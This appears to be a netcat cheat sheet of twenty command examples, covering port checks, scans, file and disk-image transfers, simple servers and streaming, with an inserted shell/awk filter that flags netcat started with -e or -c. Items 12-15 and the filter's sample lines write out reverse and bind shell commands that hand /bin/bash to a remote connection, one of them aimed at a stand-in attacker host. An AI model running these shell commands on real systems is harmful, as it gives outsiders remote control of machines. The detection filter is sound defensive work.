Netcat (nc) is a versatile networking utility for reading from and writing to network connections using TCP or UDP. Below are some practical examples showcasing its capabilities.
1. Test if a Remote TCP Port is Open
To check if a specific TCP port on a remote server is open:
nc 10.0.0.10 80
Use -u for UDP:
nc -u 10.0.0.10 80
2. Set Up a TCP Server Listening on Port 1234
To set up a simple TCP server that listens on port 1234:
nc -l 1234
For a UDP server:
nc -u -l 1234
3. Keep Netcat Listener Alive After the Current Connection Dies
To ensure the listener remains active even after the current connection closes:
nc -k -l 1234
4. Transfer File to Remote Endpoint
To transfer a file to a remote endpoint:
nc 10.0.0.10 1234 < my.tgz
Alternatively:
cat my.tgz | nc 10.0.0.10 1234
5. Receive and Save File via Netcat
To receive a file and save it:
nc -l 1234 > my.tgz
6. Create a Tarball and Pipe it to Netcat
To create a tarball of the current directory and send it via netcat:
tar -cf - . | nc -v 10.0.0.10 1234
7. Receive a Tarball and Extract it
To receive a tarball and extract its contents:
nc -lv 1234 | tar -xvf -
8. Scan a Range of Ports on a Target
To scan ports 1-1000 on a target host:
nc -z 10.0.0.10 1-1000
9. Scan Multiple Ranges of Ports
To scan multiple ranges of ports:
nc -z 10.0.0.10 1-100 200-300
10. Scan UDP Ports with 1-Second Timeout
To scan UDP ports with a 1-second timeout:
nc -vuz -w1 10.0.0.10 1-1000
11. Send an HTTP Request
To send a simple HTTP request:
printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80
12. Create a Reverse Shell on Target Host
To create a reverse shell connecting to the attacker’s IP:
nc <attacker-ip> 4444 -e /bin/bash
13. Create a Bind Shell on Target Host
To create a bind shell on the target host:
nc -l 4444 -e /bin/bash
14. Create a Persistent Netcat Listener for Bind Shell
To create a persistent listener for a bind shell:
nc -k -l 4444 -e /bin/bash
15. Run a Command and Redirect Output to Client
To run a command and send the output to the client:
nc -l 12345 -c 'uptime'
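The defender's counterpart to items 12-15, as an added example that is not part of the original cheat sheet: a filter that flags netcat processes started with -e or -c. It assumes one command line per input line (for instance from ps -eo args); the function names are hypothetical and the sample lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): flag netcat processes that
# attach a program to the socket with -e/-c, the pattern in items 12-15.
# Assumption: input is one command line per line, e.g. from `ps -eo args`.

# Constructed sample command lines; 192.0.2.10 is a documentation address.
sample_cmdlines() {
cat <<'EOF'
nc -l 1234
nc -k -l 1234
nc -z 10.0.0.10 1-1000
nc -vuz -w1 10.0.0.10 1-1000
nc 192.0.2.10 4444 -e /bin/bash
nc -k -l 4444 -e /bin/bash
nc -l 12345 -c uptime
/usr/bin/ncat -l 4444 --exec /bin/bash
grep -e error /var/log/syslog
EOF
}

# flag_nc_exec (hypothetical name): print the lines whose program is
# nc, ncat or netcat and whose options include -e or -c.
flag_nc_exec() {
  awk '{
    n = split($1, parts, "/")          # strip any directory from argv[0]
    prog = parts[n]
    if (prog != "nc" && prog != "ncat" && prog != "netcat") next
    for (i = 2; i <= NF; i++) {
      # Ncat long forms of -e and -c
      if ($i == "--exec" || $i == "--sh-exec") { print; next }
      # short option or cluster containing e or c: -e, -c, -lke, -lvc
      if ($i ~ /^-[A-Za-z]*[ec]/) { print; next }
    }
  }'
}

# count_nc_exec (hypothetical name): number of flagged lines on stdin.
count_nc_exec() {
  flag_nc_exec | wc -l | tr -d ' '
}

sample_cmdlines | flag_nc_exec
```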
16. Transfer a Gzipped Hard Drive Out
To transfer a gzipped hard drive image:
dd if=/dev/sdb | gzip -c | nc 10.0.0.10 1234
17. Save Transferred Hard Drive Image
To save a transferred hard drive image:
nc -l 1234 | sudo dd of=/backup/sdb.img.gz
18. Serve a Static Web Page
To serve a static web page using netcat:
while true; do nc -l 8000 < test.html; done
19. Start Streaming Video Upon Client Connection
To start streaming a video file upon client connection:
mkfifo /tmp/pipe; cat video.mp4 > /tmp/pipe & nc -ul 12345 < /tmp/pipe
20. Receive and Play Video Stream with MPlayer
To receive a video stream and play it using mplayer:
nc -u 10.0.0.10 12345 | mplayer -
Conclusion
Netcat is an incredibly powerful tool for network troubleshooting, file transfers, and even creating simple servers. Use these commands responsibly and ensure you have permission to interact with the systems involved.
Happy networking!